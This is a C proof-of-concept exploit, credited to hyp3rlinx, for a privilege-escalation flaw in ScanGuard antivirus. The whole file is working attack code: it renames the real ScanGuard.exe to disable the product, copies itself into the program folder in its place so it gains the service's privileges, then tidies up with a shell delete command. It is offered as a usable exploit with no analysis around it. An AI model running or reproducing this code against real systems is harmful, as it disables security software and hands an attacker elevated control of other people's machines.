CVE-2019-18895.c

#include <stdio.h>
#include <windows.h>
#define TARGET "C:\\Program Files (x86)\\ScanGuard\\ScanGuard.exe"
#define DISABLED_TARGET "C:\\Program Files (x86)\\ScanGuard\\~.conf"

/* ScanGuard EoP 
  PoC By hyp3rlinx */

BOOL PWNED=FALSE;

BOOL FileExists(LPCTSTR szPath){
  DWORD dwAttrib = GetFileAttributes(szPath);
  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

void main(void){
   
  if(!FileExists(DISABLED_TARGET)){
    rename(TARGET, DISABLED_TARGET);
    printf("[+] ScanGuard Antivirus EoP PoC\n");
    Sleep(300);
    printf("[+] Disabled ScanGuard.exe ...\n");
    Sleep(300);
  }else{
  	PWNED=TRUE;
  }
   
  char fname[MAX_PATH];
  char newLoc[]=TARGET;
  
  DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
  if (size){
     if(!PWNED){
        printf("[+] Copying exploit to vuln dir...\n");
        Sleep(300);
        CopyFile(fname, newLoc, FALSE);
        printf("[+] Replaced legit ScanGuard...\n");
        Sleep(300);
        printf("[+] Done!\n");
        Sleep(300);
        MoveFile(fname, "c:\\Program Files (x86)\\ScanGuard\\ScamGuard.lnk");
        Sleep(2000);
        exit(0);
     }else{
     	if(FileExists("ScamGuard.lnk")){
	    system("DEL /f ScamGuard.lnk");
	   }
     	printf("[+] ScamGuard PWNED!!!");
     	printf("[+] By hyp3rlinx\n");
     	system("pause");
     }
  }
}